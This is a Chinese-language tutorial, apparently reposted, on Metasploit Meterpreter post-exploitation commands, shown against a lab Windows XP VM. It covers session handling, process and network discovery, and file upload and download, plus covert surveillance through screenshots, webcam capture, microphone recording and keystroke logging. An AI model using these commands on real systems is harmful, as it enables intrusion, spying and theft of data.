Metasploit之——基本后渗透命令(metasploit攻击)

网友投稿 372 2022-10-02


Metasploit之——基本后渗透命令(metasploit攻击)

核心Meterpreter命令指的是已经被Meterpreter攻击载荷成功渗透的计算机向我们提供的用于后渗透操作的基本功能。

注意:Metasploit的后渗透命令都是在拿到了目标主机的Meterpreter权限之后,在Meterpreter命令行下执行的各种命令操作。

1.帮助菜单

输入help或者英文?就可以打开帮主菜单,如下所示:

这里,输出的结果比较多,我只是截取了一部分信息。

2.后渗透命令

在进行渗透的时候,有时需要执行其他的任务。为了执行新的任务,需要将当前执行的Meterpreter会话切换到后台,这时就需要用到background命令。

如下:

meterpreter > background[*] Backgrounding session 1...msf5 exploit(windows/> 此时,就需要将一个会话切换到前台的时候,就可以使用sessions命令加上该会话的标识符,命令格式为sessions -imsf5 exploit(windows/> sessionsActive sessions=============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 meterpreter x86/windows LIUYAZHUANG\lyz @ LIUYAZHUANG 192.168.175.128:4444 -> 192.168.175.130:1043 (192.168.175.130)msf5 exploit(windows/> sessions -i 1[*] Starting interaction with 1...meterpreter >

3.机器ID和UUID命令

获取机器ID的命令:machine_id

meterpreter > machine_id[+] Machine ID: 172edb45d23942c9e4cbe768909b4f62

获取uuid的命令:uuid

meterpreter > uuid[+] UUID: 0535181070ecda36/x86=1/windows=1/2019-01-25T01:43:55Z

4.通信信道的操作

这些操作可以通过channel实现

meterpreter > channel -l Id Class Type -- ----- ---- 1 3 stdapi_processmeterpreter > meterpreter > channel -r 1

这里,我们使用channel -l 命令列出了所有可用的通信信道,然后使用channel -r [channel-id]命令选择了读取数据的通信信道。信道子系统允许通过所有的逻辑信道进行读取、列举、写入操作,这些逻辑信道都是Meterpreter命令行实现的通信子信道。

5.获取用户名和进程信息

meterpreter > machine_id [+] Machine ID: 172edb45d23942c9e4cbe768909b4f62meterpreter > getuidServer username: LIUYAZHUANG\lyzmeterpreter > getpid Current pid: 1680meterpreter > psProcess List============ PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- 0 0 [System Process] 4 0 System x86 0 236 672 VGAuthService.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe 244 1040 wscntfy.exe x86 0 LIUYAZHUANG\lyz C:\WINDOWS\system32\wscntfy.exe 336 672 vmtoolsd.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe 480 1680 hfs.exe x86 0 LIUYAZHUANG\lyz E:\©������\HFS\hfs.exe 540 4 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe 604 540 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe 608 1220 cmd.exe x86 0 LIUYAZHUANG\lyz C:\WINDOWS\system32\cmd.exe 628 540 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe 672 628 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe 684 628 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe 860 672 vmacthlp.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmacthlp.exe 876 672 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe 944 672 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe 1040 672 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe 1132 672 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe 1196 672 alg.exe x86 0 C:\WINDOWS\System32\alg.exe 1224 876 wmiprvse.exe x86 0 C:\WINDOWS\system32\wbem\wmiprvse.exe 1236 672 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe 1416 672 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe 1428 608 conime.exe x86 0 LIUYAZHUANG\lyz C:\WINDOWS\system32\conime.exe 1504 628 logon.scr x86 0 LIUYAZHUANG\lyz C:\WINDOWS\System32\logon.scr 1680 1648 explorer.exe x86 0 LIUYAZHUANG\lyz C:\WINDOWS\Explorer.EXE 1808 1680 vmtoolsd.exe x86 0 LIUYAZHUANG\lyz C:\Program Files\VMware\VMware Tools\vmtoolsd.exe 1832 1680 ctfmon.exe x86 0 LIUYAZHUANG\lyz C:\WINDOWS\system32\ctfmon.exe

6.获取系统信息

meterpreter > sysinfoComputer : LIUYAZHUANGOS : Windows XP (Build 2600, Service Pack 3).Architecture : x86System Language : zh_CNDomain : WORKGROUPLogged On Users : 2Meterpreter : x86/windowsmeterpreter >

7.网络命令

ipconfig/ifconfig:显示被渗透主机所连接的所有内部网络arp:显示所有和被渗透主机建立过连接的IP地址,这样可以获得更过关于目标邻近系统的信息netstat:显示当前所有正在使用端口以及运行在这些端口上的进程信息。

8.文件操作命令

pwd:查看当前的工作目录cd:切换到目标文件夹cd [目标文件夹]mkdir:创建文件夹mkdir [文件夹]upload:将文件上传到目标系统upload [本地文件] [目标系统路径]edit:修改文件edit [目标文件]ls:列出目标主机指定目录中的文件ls [目标文件夹]rmr:删除目标系统上指定的文件夹rmr [目标文件夹]rm:删除目标系统上指定的文件rm [目标文件]download:从目标下载文件download [目标文件] [本地路径]

9.桌面命令

使用enumdesktops和getdesktop可以查看被渗透主机的桌面信息,enumdesktops列出了所有可以访问的桌面,而getdesktop列出了当前桌面的相关信息,如下:

meterpreter > enumdesktops Enumerating all accessible desktopsDesktops======== Session Station Name ------- ------- ---- 0 WinSta0 Default 0 WinSta0 Disconnect 0 WinSta0 Winlogon 0 SAWinSta SADesktopmeterpreter > getdesktop Session 0\W\Dmeterpreter >

10.截图和摄像头列举

10-1.获取当前桌面的快照

使用screenshot命令

meterpreter > screenshot Screenshot saved to: /root/iOOsMPCB.jpeg

截图的结果:

10-2.列举摄像头

webcam_list

10-3.录制实时视频

webcam_stream

10-4.拍照

webcam_snap

10-5.进行环境监听

某些时候我们可能处于监视目的需要进行环境监听,就可以使用record_mic命令。

meterpreter > record_mic [*] Starting...[*] StoppedAudio saved to: /root/hStZovMr.wav

也可以使用record_mic命令加上-d参数制定录音的长度,这个参数单位是秒。

10-6.计算目标系统闲置时间

idletimemeterpreter > idletimeUser has been idle for: 21 mins 19 secs

10-7.监控键盘

启动监听:keyscan_start导出记录:keyscan_dump停止监听:keyscan_stop

meterpreter > keyscan_startStarting the keystroke sniffer ...meterpreter > keyscan_dump Dumping captured keystrokes...meterpreter > keyscan_stopStopping the keystroke sniffer...meterpreter >


版权声明:本文内容由网络用户投稿,版权归原作者所有,本站不拥有其著作权,亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容,请联系我们jiasou666@gmail.com 处理,核实后本网站将在24小时内删除侵权内容。

上一篇:Metasploit之——高级后渗透模块(metasploit常用漏洞)
下一篇:Java中的自定义异常捕获方式
相关文章

 发表评论

暂时没有评论,来抢沙发吧~